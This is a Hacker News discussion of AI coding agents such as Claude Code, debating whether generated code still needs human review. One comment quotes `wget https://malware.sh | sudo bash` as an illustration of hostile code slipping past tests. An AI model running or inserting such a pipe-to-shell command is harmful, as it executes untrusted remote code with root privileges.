For most of 2025, I ignored popular agents because I wanted to stay within my preferred text editor (Emacs). Thanks to ACP (https://agentclientprotocol.com), I no longer live under a rock ;) I built https://github.com/xenodium/agent-shell and now get a native experience. Claude Code works great. If curious what that looks like, I made a video recently https://xenodium.com/bending-emacs-episode-10-agent-shell
This is awesome. Thanks for chatgpt-shell.el too. Could use authinfo for api-keys so don't have to put them inside config (saved in ~/.authinfo, format eqv. to ~/.netrc).
> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.
Maybe for a personal project but this doesn't work in a multi-dev environment with paying customers. In my experience, paying attention to architecture and the code itself results in a much more pliable application that can be evolved.
Agree. And with the comments in the thread.
I'll caveat my statement, with AI ready repos. Meaning those with good documentation, good comments (ex. avoiding Chestertons fence), comprehensive interface tests, Sentry, CI/CD, etc.
Established repos are harder because a) the marginal cost of something going wrong is much higher b) there's more dependencies c) this makes it harder to 'comprehensively' ensure the AI didn't mess anything up
I say this in the article
> There's no "right answer." The only way to create your best system is to create it yourself by being in the loop. Best is biased by taste and experience. Experiment, iterate, and discover what works for you.
Try pushing the boundary. It's like figuring out the minimum amount of sleep you need. You undersleep and oversleep a couple times, but you end up with a good idea.
To be clear, I'm not advocating for canonical 'vibe coding'. Just that what it means to be a good engineer has changed again. 1) Being able to quickly create a mental map of code at the speed of changes, 2) debugging and refactoring 3) prompting, 4) and ensuring everything works (verifiability) are now the most valuable skills.
We should also focus more on the derivative than our point in time.
> Being able to quickly create a mental map of code at the speed of changes
I get the feeling you're intentionally being a parody with that line.
> and ensuring everything works (verifiability) are now the most valuable skills.
Something might look like it works, and pass all the tests, but it could still be running `wget https://malware.sh | sudo bash`. Without knowing that it's there how will your tests catch it?
My example is exaggerated and in the real world it will be more subtle and less nefarious, but just as dangerous. This has already happened, OpenCode is a recent such example. It was on the front page a few days ago, you should check it out. Of course you have to review the code. Who are you trying to fool?
> We should also focus more on the derivative than our point in time.
So why are you selling it as possible in "our point in time" (are you getting paid per buzzword?). I read the quote as "Yes, I'm full of shit, but consider the possibilities and stop being a buzzkill bro".
Extremely depressing to see this happening to the craft I used to love.
Counter argument...
High velocity teams also observe production system telemetry and use error rates, tracing and more to maintain high SLAs for customers.
They set a "budget" and use feature flagging to release risky code and roll back or roll forward based on metrics.
So agentic coding can feed back on observed behaviors in production too.
It's definitely an area where we'll all learn a lot in the upcoming years.
But we have to use this "innovation budget" in a careful way.
^this
It's doesn't work...yet. I agree my stomach churns a little at this sentence. However, paying customers care about reliability and performance. Code review helps that today, but it's only a matter of time before it is more performative than useful in serving those goals at the cost of velocity.
the (multi) billon dollar question is when that will happen, I think, case in point:
the OP is a kid in his 20s describing the history of the last 3 years or so of small scale AI Development (https://www.linkedin.com/in/silen-naihin/details/experience/)
How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc.
When will AI be ready? Microsoft tried to push AI into big enterprise, Anthropic is doing a better job -but its all still in infancy
Personally for me I hope it won't be ready for another 10 years so I can retire before it takes over :)
I remember when folks on HN all called this AI stuff made up
This is what people were saying about Rails 20 years ago: it wows the kids who use it to set up a CRUD website quickly but fails at anything larger-scale. They were kind of right in the sense that engineering a large complex system with Rails doesn't end up being particularly easier than with Plone or Mason or what have you. Maybe this will just be Yet Another Framework.
Ruby OnRails is an interesting hype counter point.
A substantial number of the breathless LLM hype results come, in my estimation, quicker and better as 15 min RoR tutorials. [Fire up a calculator (from a library), a pretty visualization (from a js library), add some persistence (baked in DB, webhost), customize navigation … presto! You actually built a personal application.]
Fundamental complexity, engineering, scaling gotchyas, accessibility needs, customer insanity aren’t addressed. RoR optimizes for some things, like any other optimization that’s not always a meaningful.
LLMs have undeniable utility, natural interaction is amazing, and hunting in Reddit, stackoverflow, and MSDN forums ‘manually’ isn’t a virtue… But when the VC subsidies stop and the psychoses get proper names and the right kind of egg hits the right kind of face over unreviewed code, who knows, maybe we can make a fun hype cycle called “Actual Engineering” (AE®).
Thats the problem, the most “noise” regarding AI is made by juniors who are wowed by the ability to vibe code some fun “sideproject” React CRUD apps, like compound interest calculators or PDF converters.
No mention of the results when targeting bigger, more complex projects, that require maintainability, sound architectural decisions, etc… which is actually the bread and butter of SW engineering and where the big bucks get made.
>>like compound interest calculators or PDF converters.
Caught you! You have been on HN very actively the last days, because these were exactly the projects in "Show HN: .." category and you would not be able to tell them if you wouldnt have spent your whole time here :-D
Ha! :-D
As a guy in his mid-forties, I sympathize with that sentiment.
I do think you're missing how this will likely go down in practice, though. Those giant codebases with years of domain rules are all legacy now. The question is how quickly a new AI codebase could catch up to that code base and overtake it, with all the AI-compatibility best practices baked in. Once that happens, there is no value in that legacy code.
Any prognostication is a fool's errand, but I wouldn't go long on those giant codebases.
Yeah agreed - It all depends on how quickly AI (or more aptly, ai driven work done by humans hoping to make a buck) starts replacing real chunks of production workflows
“prediction is hard especially about the future” - yogi berra
As a hedge - I have personally dived deep into AI coding, actually have been for 3 years now - I’ve even launched 2 AI startups and working on a third - but its all so unpredictable and hardly lucrative yet
As an over 50 year old - I’m a clear target for replacement by AI
How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc.
At most of the companies I've worked at the development team is more like a cluster of individuals who all happen to be contributing to a shared codebase than anything resembling an actual team who collaborate on a shared goal. AI-assisted engineering would have helped massively because the AI would be looking outside of the myopic view any developer who is only focused on their tiny domain in the bigger whole cared about.
Admittedly though, on a genuinely good team it'll be less useful for a long time.
I'm currently in a strange position where I am being that developer with 15+ years of industry experience managing a project that's been taken over by a young AI/vibe-code team (against my advise) that plans to do complete rewrite in a low-code service.
Project was started in late 00s so it has substantial amount of business logic, rules and decisions. Maybe I'm being an old man shouting at the clouds, but I assume (or hope?) it would fail to deliver whatever they promised to the CEO.
So, I guess I'll see the result of this shift soon enough - hopefully at a different company by the time AI-people are done.
The problem is, feedback cycles for projects are long. Like 1-10 years depending on the nature and environment. As the saying goes, the market can remain irrational longer than you can remain solvent.
Maybe the deed is done here, and I'd agree it's not particularly fun, but you could still think about what you can bring to the table in situations like this. Can you work on shortening these pesky feedback cycles? Can you help the team (if they even accept it) with _some_ degree of engineering? It might not be the last time this happens.
I think right now we're seeing some weird stuff going on, but I think it hasn't even properly started yet. Remember when pretty much every company went "agile"? In most cases I've seen they didn't, just wasting time chasing miracles with principles and methodologies few people understand deeply enough to apply. Yet this went on for, what, 10 years?
Everyone who is responsible for SOC 2 at their company just felt a disturbance.
Honestly, I can't wait for AI: development practices to mature, because I'm really tired of the fake hype and missteps getting in the way of things.
Why would AI not fall for fake hype?
Meanwhile here’s me still just using the ChatGPT web chat asking it for code snippets.
I found that when I used ChatGPT's web chat, I frequently went back and forth, shuttling its output to an editor or IDE and then coming back to ChatGPT with "oh, now it fails like this: ...". It made me feel like I was the automaton now.
Claude Code was transformative and it made me realize that something very incredibly significant had occurred. Letting the LLM "drive" like this was inevitable. Now I see just exactly how this will transform our industry. I'm a little scared about how it will end for me/us, but excited for now.
I've found that "back and forth" is part of the learning aspect LLM's provide. Even when the LLM provides code snippets, I type them out myself, which I've found forces me to think and understand them - often finding flaws and poor assumptions along the way.
Letting an LLM drive in an agentic flow removes you from the equation. Maybe that's what some want - but I've personally found I end up with something that doesn't feel like I wrote it.
Now... get off my lawn!
It's correct, you didn't write it. Do you also avoid using frameworks and libraries for desire of feeling like you wrote the program you produced? You must have another reason to not want to use this code.
When you use frameworks or libraries, you are trusting (hoping) the author(s) spent the time to get it right. At a minimum, the framework/library is documented in literal documentation and/or code that's static and can be read and understood by you. Ask an LLM to do a task 3 times, you'll get 3 different outputs - they're non-deterministic.
I catch a lot of nonsensical and inefficient code when I have that "back and forth" described above - particularly when it comes to architectural decisions. An agent producing hundreds or thousands of lines of code, and making architectural decisions all in one-go will mean catching those problems will be vastly more challenging or impossible.
I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code. It's just a mental/brain drain. I've wasted so many hours wondering if I'm just dumb and missing something or not-understanding some code - only to later realize the LLM was on the fritz. Having little or no previous context to understand the code creates a "standing at the foot of Mt. Everest" feeling constantly, over and over.
>I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code.
absolute opposite here.
LLMs , for better or worse, generally stick to paradigms if they have the codebase in front of them to read.
This is rarely the case when dealing with an amateur's code.
Amateurs write functional-ish code. TDD-ish tests. If the language they're using supports it types will be spotty or inconsistent. Variable naming schemes will change with the current trend when the author wrote that snippet ; and whatever format they want to use that day will use randomized vocabulary with lots of non-speak like 'value', or 'entry' in ambiguous roles.
LLMs write gibberish all day, BUT will generally abide by style documents fairly well. Humams... don't.
These things evolve as the codebase matures, obviously, but that's because it was polished into something good. LLMs can't reason well and their logic sometimes sucks, but if the AGENTS.md says that all variables shall be cat breeds -- damnit that's what it'll do (to a fault).
but my point : real logic and reasoning problems become easier to spot when you're not correcting stupid things all day. it's essentially always about knowing how to use the model and whatever platform it's jumping from. Don't give it the keys to create the logical foundation of the code, use it to polish brass.
garbage in -> garbage out ain't going anywhere.
False equivalency. The maintenance and expertise required to run the codebase you’ve generated still falls flatly on you. When you use a library or a framework it normally is domain experts that do that stuff.
I’m so glad we’ve got domain experts to write those tricky things like left-pad for us.
On a more serious note, I do think that the maintenance aspect is a differentiator, and that if it’s something that you end up committing to your codebase then ownership and accountability falls to you. Externally sourced libraries and frameworks ultimately have different owners.
I'm reminded of the recent "vibe coded" OCaml fiasco[1].
In particular, the PR author's response to this question:
> Here's my question: why did the files that you submitted name Mark Shinwell as the author?
> > Beats me. AI decided to do so and I didn't question it.
The same author submitted a similar PR to Julia as well. Both were closed in-part due to the significant maintenance burden these entirely LLM-written PR's would create.
> This humongous amount of code is hard to review, and very lightly tested. (You are only testing that basic functionality works.) Inevitably the code will be full of problems, and we (the maintainers of the compiler) will have to pay the cost of fixing them. But maintaining large pieces of plausible-in-general-but-weird-in-the-details code is a large burden.
Setting aside the significant volume of code being committed at once (13K+ lines in the OCaml example), the maintainers would have to review code even the PR author didn't review - and would likely fall into the same trap many of us have found ourselves in while reviewing LLM-generated code... "Am I an idiot or is this code broken? I must be missing something obvious..." (followed by wasted time and effort).
The PR author even admitted they know little about compilers - making them unqualified to review the LLM-generated code.
[1] https://github.com/ocaml/ocaml/pull/14369
Yeah but honestly VSCode with Github copilot plugin works in a similar way. Might not be as good but it works
I've been doing this forever, but just a few days ago I tried connecting VS Code to Github Copilot. The experience wasn't entirely unpleasant. I'm still on a familiar IDE and fall back to traditional development patterns whenever I want, while relying on Copilot to make targeted changes that I would find too simple and tedious to manually do.
Try Cursor Composer! It's the most natural transition. Exactly what you're currently doing, but it inserts the code snippets for you from within your IDE.
I do that too.
> Use Claude Code if you
> a) never plan on learning and just care about outputs, or
> b) are an abstraction maximilist.
As a Claude Code user for about 6 months, I don't identify with either of these categories. Personally I switched to Claude Code because I don't particularly enjoy VScode (or forks thereof). I got used to a two window workflow - Claude Code for AI-driven development, and Goland for making manual edits to the codebase. As of a few months ago, Claude Code can show diffs in Goland, making my workflow even smoother.
Do you find yourself making manual changes 50%, 40%, 30%… of the time?
Always curious to hear how individuals have their workflows, if you don’t mind sharing.
My only gripe with the Goland integration is if you have multiple terminals open with CC, it will randomly switch to the first terminal for no apparent reason. Then, if you aren't paying close attention, you prompt the wrong instance.
"my experience from 5 years of coding with AI" immediately disregarded the rest of TFA.
I really love AI for lots of things, but, when I'm reading a post, the AI aesthetic has started to grate. I read articles and they all have the same "LLM" aesthetic, and I feel like I'm reading posts written by the same person.
Sure, the information is all there, but the style just puts me off reading it. I really don't like how few authors have a voice any more, even if that voice is full of typos and grammatical errors.
What sections where you most off put by?
I used Claude to expand on my ideas for a few of the purely informational things, and for formatting, but this article is largely written by hand.
For example "Interface tests are the ability to know what's wrong and explaining it." is in hindsight a confusing sentence. Many such cases.
It's things like this "super impactful!!!" style it has:
> Enter Claude Code 2.0.
> The UX had evolved. The harness is more flexible and robust. Bugs are fixed. But that's all secondary.
It's OK for emphasis on some things, but when you see it on every blog, it's a bit much.
Plus, I dislike that everything is lists with LLMs, it's another thing that you just start seeing everywhere.
That section doesn't include a lick of AI writing. One tell (maybe?) is that I switch from past tense to present tense mid sentence.
Either a) I sound like an LLM when I'm writing articles (possible) or b) turing test AGI something something.
Lists point is fair, I did use Claude for formatting. Where did it off put you here?
There isn't a specific place, it's the general aesthetic. Maybe you do sound like an LLM :P I guess it's not unlikely to pick up some mannerisms from them when everyone is using them.
I guess I don't really mind the use of an LLM or not, it's more the style that sounds very samey with everything else. Whether it's an LLM or not is not very relevant, I guess.
> a) I sound like an LLM when I'm writing articles (possible) or b) turing test AGI something something.
We entered the machinable culture. We spent many years trying to make the machine mimic humans, now humans are mimicking the machine :)
what's crazy to me is that it's literally a sentence in your prompt to make it change the style, but i guess some people are not bothered by it
Would appreciate feedback, see my comment above!
My brain kinda shuts off when I read this stuff because I know it's more of a "text shaped object" than actual text. I find LLM text to be too fluffy and information sparse much of the time so I subconsciously start skimming it more than actually reading it.
Outside of the story at the start I intentionally tried to make it information dense. Would appreciate feedback!
>I built a genetic algorithm simulator with interactive visualizations showing evolution in real-time including complex fitness functions, selection pressure, mutation rates, and more in 1 day. I didn't write a single line of the code.
I'm really trying to understand this. From a learner point of view this is useless because you aren't learning anything. From an entrepreneur point of view it's useless too, I suppose? I wouldn't ship something I'm not 100% sure about how it works.
This must be the fifth article I have read today (mostly from the home page of HN) that has "Enter X" where X is what they are promoting.
>> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.
I think this is where things will ultimately head. You generate random code, purely random in raw machine readable binary, and simply evaluate a behavior. Most random generated code will not work. some, however, will work. and within that working code, some will be far faster and this is the code that is used.
No different than what a geneticist might do evaluating generated mutants for favorable traits. Knowledge of the exact genes or pathways involved is not even required, one can still select among desired traits and therefore select for that best fit mechanism without even knowing it exists.
Why should we throw away decades of development in determistic algorithms? Why tech people mentions "geneticists"? I would never select an algorithm with a "good" flying trait for making an airplane works, that's nuts
But you have selected an algorithm with a "good" flying trait already for making airplanes. Just with another avenue to get to it versus pure random generation. The evolution of the bird has came up with another algorithm for example, where they use flapping wings instead of thrust from engines. Even among airplane development, a lot was learned by studying birds, which are the result of a random walk algorithm.
No there is no selection and no traits to pick, it's the culmination of research and human engineering. An airplan is a complex system that needs serious engineering. You can study birs but up till a certain point, if you like it go doing bird watching, but it's everything except engineering
>it's the culmination of research and human engineering.
And how is this different than the process of natural selection? More fit ideas win out relative to less fit and are iterated upon.
First of all natural selection doesn't happen per se, nor is controlled by some inherent mechanism, it's the by product of many factors external and internal. So the comparison is just wrong. Human engineering is an interative process not a selection. And if we want to call it selection, even though it is a stretch, we're controlling it, we the master of puppets, natural selection is anything but a controlled process. We don't select a more resistant wing, we engineer the wing with a high bending tolerance, again it's an iterative process
We do select for a more resistant wing. How did we determine that this wing is more resistant? We modeled its bending tolerance and selected this particular design against other designs that had worse evaluated results for bending tolerance.
And that, my friend, is just engineering, like I said above it's an iterative process. There is no "natural selection" from random shaped wings
First, how did we model the bending tolerance if everything is just randomness?
Second, there are other algorithms that constructively find a solution and don't work at all like genetic algorithms, such as mathematical solvers.
Third, sometimes, a design is also simply thought up by a human, based on their own professional skills and past experience.
Yes, and it was an intentional process.
Natural selectiom:
- is not an intentional process
- does not find "the strongest the fittest the fastest etc."
By that logic, everything humans do is per definition result of natural selection. Everything is a sphere if you zoom out far enough.
However your starting definition was more limited. it was specifically about "creating candidates at random, then just picking the one that performs best" - and that's definitely not how airplanes are designed.
(It's not even how LLMs work, in fact)
Great rule of business: sell a solution that causes more problems, requiring the purchase of more solutions.
Customers are tired of getting piles of shit, look at the Windows situation
Or don't sell the solution. When you have monopolies, regulatory capture, and endless mountains of money, you can more or less do what you'd like.
That's a lie, people will eventually find a way out, it was always like that, being it open source or by innovating and eventually leave the unable to innovate tech giants dying. We have Linux and this year will be the most exciting for the Linux desktop given how bad the Windows situation is
Only been hearing that for twenty years and these tech giants are bigger than they’ve ever been.
I remember when people said Open Office was going to be the default because it was open source, etc etc etc. It never happened. Got forked. Still irrelevant.
I said "being it open source or by innovating" eg Google innovated and killed many, also contributed a lot to open source. Android is a Linux success, ChromeOS too. Now Google stinks and it is not innovating anymore, except for when other companies, like OpenAI, come for their lunch. Google was caught off guard but eventually catching up. Sooner or later, big tech gets eaten by next big tech. I agree if we stop innovating that would never happen, like Open Office is the worst example you could have picked
The problem is that programming logic/state is discrete and not continous so you can't assume similar behaviour given "similar state", and that possible states grow exponentially. Selecting the desired state will mean writing an extremely detailed spec that is akin to a programming language, which is what Dijkstra hinted at in the past.
Maybe, but you won't be able to test all behaviors and you won't have enough time to try a million alternatives. Just because of the number of possibilities, it'll be faster to just read the code.
That's why you buy a quantum computer. It writes every possible piece of software at once and leaves you the trivial task of curating the one you want.
Eventually the generation and evaluation will be quite fast where testing a million alternatives will be viable. Impressive you suggest that there might be a million alternatives but it would be faster to just read the code and settle on one. How might that be determined? Did the author who wrote the standard library really come up with the best way when writing those functions? Or did they come up with something that seemed alright to ship relative to other ideas people came up with?
I think we need to think outside the box here and realize ideas can be generated, evaluated, and settled upon far faster than any human operates. The idea of doing what a trillion humans evaluating different functions can do is actually realistic with the path of our present technology. We are at the cusp of some very remarkable times, even more remarkable than the innovations of the past 200 years, should we make progress on this effort.
A million alternatives is peanuts. Restricting the search space to text files with 37 possible symbols (letters, numbers, space), a million different files can be generated with just 4 symbols.
A trillion is 8 symbols. You still haven't reached the end of your first import statement.
I just took a random source file on my computer. It has about 8000 characters. The number of possible files with 8000 characters has 12500 digits.
At this point, restricting the search space to syntactically valid programs (how do you even randomly generate that?) won't make a difference.
> restricting the search space to syntactically valid programs (how do you even randomly generate that?)
By using a grammar. Here is an example on how to only generate valid JSON with llama.cpp: https://github.com/ggml-org/llama.cpp/blob/master/grammars/R...
> A trillion is 8 symbols. You still haven't reached the end of your first import statement.
Since LLMs use tokens from a vocabulary instead of characters, the number is likely somewhere in the lower billions for the first import statement.
But of course, LLMs do not sample from a uniform random distribution, so there are even fewer likely possibilities.
This comment strikes me as not having a good intuition for how fast the space of possible programs can grow.
You don't think the space of possible problems can be parsed with increased compute?
Not for all problems, definitly not. As an example of extremely fast-growing problem spaces, look at the Busy Beaver functions:
https://en.wikipedia.org/wiki/Busy_beaver
If this were viable, we'd all be running Haiku ten times in the time it took to run Opus once, but nobody does.
We don't have the compute for this today. We will in several centuries, if compute growth continues.
We definitely would need centuries for this, because Moore's law has been dead for a while, while the number of possible programs grows exponentially in it's length.
But I hope we have more efficient ways to do this in a century.
For this to work, you'd have to fully specify the behavior of your program in the tests. Put another way, at that point your tests are the program. So the question is, which is a more convenient way to specify the behavior of a program: a traditional programming language, or tests written in that language. I think the answer should be fairly obvious.
Behavior does not need to be fully specified at the outset. It could be evaluated after the run. We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development. What is a bird but the output of a random walk algorithm selected by constraints bound by so many latent factors we might never fully grasp?
> Behavior does not need to be fully specified at the outset. It could be evaluated after the run.
This doesn't work when the software in question is written by competent humans, let alone the sort of random process you describe. A run of the software only tells you the behavior of the software for a given input, it doesn't tell you all possible behaviors of the software. "I ran the code and the output looked good" is no where near sufficient.
> We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development.
There is a vast chasm between "bioinspiration is sometimes a good technique" and "genetic algorithms are a viable replacement for writing code".
Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.
And with future compute, you will be able to evaluate behavior across an entire range of inputs for countless putative functions. There will be a time when none of this is compute bound. It is today, but in three centuries or more?
https://www.mcgill.ca/oss/article/student-contributors-did-y...
Evolution ain't all that great.
> Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.
Yes, and our species is a fragile barely functioning machinery with an insane number of failing points, and hillariously bad and inefficiently placed components.
I can see a lot of negatives in relation to removing the human readable aspect of software development. Thorough testing would be virtually impossible because we’d be relying on fuzzing to iron out potential edge cases or bugs.
In this situation, AI companies are incentivised to host the services their tooling generates. If we don't get source code, it is much easier for them to justify not sharing it. Plus, who is to say the machine code even works on consumer hardware anyway? It leads to a future where users specify inputs while companies generate programs and handle execution. Everything becomes a black box. No thank you.
All these questions are true for agriculture, yet you say "yes thank you, and please continue" for that industry I am sure, which seeks to improve product through random walk and unknown mechanisms. Maybe take a step back and examine your own biases.
> All these questions are true for agriculture, yet you say "yes thank you, and please continue" for that industry I am sure, which seeks to improve product through random walk and unknown mechanisms.
Tell me you know nothing about modern agriculture without telling me that
You're describing genetic algorithms: https://en.wikipedia.org/wiki/Genetic_algorithm
Exactly. As compute increases these algorithms will only get more compelling. You can test and evaluate so many more ideas than any human inventors can generate on their own.
I suppose you could generate prompts from "genes" somehow.
all fun and games until you need to debug the rats nest that you've been continually building. I am actually shocked people who have coded before have been one-shotted into believing this
If a bug rears its head it can be dealt with. Again, this is essentially already practiced by humans through breeding programs. Bugs have come up, such as deleterious traits, and we have either engineered solutions to get around them or worked to purge the alleles behind the traits from populations under study. Nothing is ever bug free. The question is if the bugs are show stoppers or not. And random walk iteration can produce more solutions that might get around those bugs.
Agree! Don't let it get too bad. See my other comment on debugging and refactoring being a core part of your workflow.
We would of course need to specify the behaviors to test for. The more precisely we specify these behaviors, the more complexly our end product would be able to behave. We might invent a formal language for writing down these behaviors, and some people might be better at thinking about what kind of tests would need to be written to coax a certain type of end result out of the machine.
But that's future music, forgive a young man for letting his imagination run wild! ;)
If we consider other fields such as biology, behaviors of interest are specified but I'm not sure a formal language is currently being used per say. Data are evaluated on dimensional terms that could be either quantitative or qualitative. meta analysis of some sort might be used to reduce dimensionality to some degree but that usually happens owing to lack of power for higher resolution models.
One big advantage of this future random walk paradigm is you would not be bound by the real world constraints of sample collection of biological data. datasets could be made arbitrarily large and cost to do so will follow an inverse relationship with compute gains.
> You generate random code,
Code derived from a training set is not at all "random."
Not saying training set or present LLM. Truly random binary generator left to its own device. Lets evaluate what spits out from that iterated several trillion times over with the massive compute capability we will have. I am not thinking of this happening in the next couple years, but in the next couple of centuries.
> Truly random binary generator left to its own device.
This has been tried. It tends to overfit to unseen test environment conditions. You will not produce what you intend to produce.
> the massive compute capability we will have
Just burn carbon in the hopes something magical will happen. This is the mentality of a cargo cult.
We also burn carbon to feed the brain. Compute is what is increasing in capability on the scale of orders of magnitudes just within our own lifetimes. Brainpower is not increasing in capability. If you want future capabilities and technological advancement to occur at the fastest pace possible, eventually we have to leave the slow ape brain behind in favor of sources of compute that can evaluate functions several orders of magnitude faster.
This is a recurring fantasy in LLM threads but makes little sense. Writing machine code is very difficult (even writing byte code for simple VMs is annoying and error-prone). Abstractions are beneficial and increase productivity (per human, per token). It makes essentially no sense to throw away seven decades of productivity increasing technologies to have neural nets punch cards again, and it's not going to happen unless tokens become unimaginably cheap.
Compute is always increasing on this planet. It makes no sense to stick with seven decade old paradigms from the time when we were simply transmuting mathematical proofs into computational functions. We should be exploring the void, we will have the compute for this. Randomness will take away the difficulty as we increase compute to parse over these random functions in reasonable time frames. The idea of limiting technological development to what our ape brain can conceive of on its own on human biological timescales is quite a shackle, honestly.
How do you handle the larger amounts of tests? I did this but my PRs are larger because more tests are needed
I'm not sure. My thinking is this will occur on the scale of the next several hundred years, not the next few.
> ou generate random code, purely random in raw machine readable binary, and simply evaluate a behavior. Most random generated code will not work. some, however, will work. and within that working code, some will be far faster and this is the code that is used.
Humans are expensive but this approach seems incredibly inefficient and expensive. Even a junior can make steady progress against implementing a function, with your approach, just monkey coding like that could take you ages to write a single function. Estimates in software are already bad, they will get worse with your approach
Today it might not work given what a junior could do against the cost of compute through random walk, but can you say the same in three centuries? We increase compute by the year, but our own brainpower does not increase on those terms. Estimates are that we are actually losing brainpower over time.
And how exactly do you foresee probabilistic systems working out in real life? Nobody wants software that seldom does what they expect, and which tends to trend toward desirable behavior over time (where "desirable" behavior is determined by the sum of global feedback and revenue/profit of the company producing it).
Today you send some money to your spouse but it's received by another person with the same name. Tomorrow you order food but your order gets mixed up with someone else's.
Tough luck, the system is probabilistic and you can only hope that the evolutionary pressures influence the behavior to change in desirable ways. This fantasy is a delusion.
You're thinking of probabilistic systems at run time. People are talking about probabilistic systems at compile time.
Whatever gets generated, if it passes tests and is observably in compliance with the spec, is accepted and made permanent. It's the clay we're talking about Jackson Pollocking, not the sculpture.
I'm not, I'm thinking of poorly engineered systems that display buggy, unintended behaviors at runtime.
> observably in compliance with the spec
That's so easy to say and so incredibly hard to implement! Most unintended behaviors will never end up being prohibited/defined in the specification written by non-programmers.
The act of translating requirements from human language into well-defined semantics is what programming is.
Tests don't go over the space of all possible inputs and you have no idea how other inputs are generalized or interpolated.
I think you misunderstand. Once established a function found through random walk is no different than a function found in any other way. If it works it works, if it doesn't it doesn't.
I didn't misunderstand. I'm talking about all the exciting unintended behaviors you're adding and all the invariants that you're not preserving by arriving at solutions through randomness rather than careful design and engineering.
Yes a function will always do "the exact same thing" at runtime, but that "thing" isn't guaranteed to be free from race conditions and other types of bugs.
I can tell you why this won't go this way:
Customers.
When you sell them a technological solution to their problem, they expect it to work. When it doesn't, someone needs to be responsible for it.
Now, maybe I'm wrong, but I don't see any of the current AI leaders being like, "Yeah, you're right, this solution didn't meet your customer's needs, and we'll eat the resulting costs." They didn't get to be "thought leaders" in the current iteration of Silicon Valley by taking responsibility for things that got broken, not at all.
So that means you will need to take responsibility for it, and how can you make that work as a business model? Well, you pay someone - a human - who knows what they're looking at to review at least some of the code that the AI generates.
Will some of that be AI-aided? Of course. Can you make a lot of the guesswork go away by saying "use commonly-accepted design patterns" in your CLAUDE.md? Sure. But you'll still need someone to enforce it and take responsibility at the end of the day if it screws up.
You are thinking in terms of the next few years not the next few centuries. Plenty of software sold today fails to meet expectations and no one eats costs.
The "Council of models" is a good first step, but ultimately I found myself settling on an automated talent acquisition pipeline.
I have a BIRTHING_POOL.md that combines the best AGENTS.md and introduces random AI-generated mutations and deletions. The candidates are tested using take-home PRs which are reviewed by HR.md and TECH_MANAGER.md. TECH_MANAGER.md measures completion rate per tokens (effectiveness) and then sends the stack ranking of AGENT.mds to HR to manage the talent pool. If agent effectiveness drops low enough, we pull from the birthing pool and interview more candidates.
The end result is that it effectively manages a wider range of agent talents and you don't get into these agent hive mind spirals you get if every worker has the same system prompt.
Is this satire? I can't tell any more.
I sincerely hope so. Gas Towns, Birthing Pools, Ralf Wiggums. Some people seems to have lost any sense of reality.
I don't understand why people try so hard to anthropormophize these tools and map them to human sociology...
It's all abstractions to help your brain understand what electrons are doing in impossibly pure sand. Pick the one that frees the most overhead to think about problems that matter
*Note:* This is mostly relevant for solo developers, where accountability is much lower than in a team environment.
Code review is the only thing that has kept this house of cards from falling over. So undermining its importance makes me question the hype around LLM tooling even more. I’ve been using these tools since their inception as well, but with AI tooling, we need to hold on to the best practices we’ve built over the last 50 years even more, instead of trying to reinvent the wheel in the name of “rethinking.”
Code generation is cheap, and reviews are getting more and more expensive. If you don’t know what you generated, and your team doesn’t know either because they just rubber-stamped the code since you used AI review, then no one has a proper mental model of what the code actually does.
So when things come crashing down in production, debugging and investigation will be a nightmare. We’re already seeing scenarios where on-call has no idea what’s going on with a system, so they page the SME—and apparently the SME is AI, and the person who did the work also has no idea what’s going on.
Until omniscient AI can do the debugging as well, we need to focus on how we keep practicing the things we’ve organically developed over such a long time, instead of discarding them.
use both ~ Claude Code as main driver, hook it up to Cursor with /ide in Claude code to review or make other manual adjustments.
Have OpenAI Codex do code reviews, it’s the best one so far at code reviews. Yes, it’s ironic (or not) that the code writer is not the best reviewer.
>> You no longer need to review the code.
You also no longer need to work, earn money, have a life, read, study, know anything about the world. This is pure fantasy my brain farts hard when I read sentences like that
You also no longer need to work, earn money, have a life, read, study, know anything about the world. This is pure fantasy
This will be reality in 10-20 years
A traditional Marxist revolution is more likely than that.
It's already reality if you want to, today and in 10-20 years the outcome will be the same: being an homeless! And no please no UBI bs thanks
99.9% of today’s jobs will be fully automated in 20 years. What do you think will happen to all the unemployed population?
I remember when they were saying that 20 years ago
hahahahaha. Please can you advice on lottery numbers? I'd like to win a bunch of money before losing the job
Before I waste any time on this article, is the "0.01%" claim backed up with any evidence?
He shows an alleged screenshot of an email sent by the vendor. There is also a cool animation of what seems to be a chromosome gallery produced by the result of a genetic algorithm of some sort which took 1 day for claude.
If you like Claude Code, then Gas Town (recent discussion [1]) will probably blow your mind. I'm just trying to get a grip on it myself. But it sounds incredible.
[1] https://news.ycombinator.com/item?id=46458936
The mayor doesn't communicate to the deacon or refiner well enough. Sometimes my polecat acts like a witness so I have to restart it...
Jesse what the fuck are you talking about
Just wait ‘til Gas City ships.
This town ain't big enough for the both of us
I am still a WindSurf user. It has the quirk of deciding for itself on any given day whether to use ChatGPT 5.2 or Claude Opus 4.5 in Cascade (its agentic side panel). I've never noticed much of a difference, they are both amazing.
I thought the difference must be in how Claude Code does the agentic stuff - reasoning with itself, looping until it finds an answer, etc. - but I have spent a fair amount of time with Claude Code now and found that agentic experience to be about the same between Cascade and Claude Code.
What am i missing? (serious question, i do have Claude Code FOMO like the OP)
Wondering too, I found Windsurf excellent for what it does, but do miss my preferred $EDITOR
Thank you for this article! It was way richer than others, with some actionable advice.
I guess I'll finally try Claude Code, need to get a burner SIM first though… I cannot for the life of me understand why I can just sign up for the API yet must give a mobile phone number for the product.
> my experience from 5 years of coding with AI
What AI have you been using for 5 years of coding?
Probably the original GitHub Copilot
It is only 4 years old
technical preview in June 2021. I was using it for a bit before that as an internal employee. so they may have rounded up slightly or also were an internal beta test
side note, I’ve been trying to remember when it launched internally if anybody knows. I feel like it was pre-COVID, but that’s a long timeline from internal use to public preview
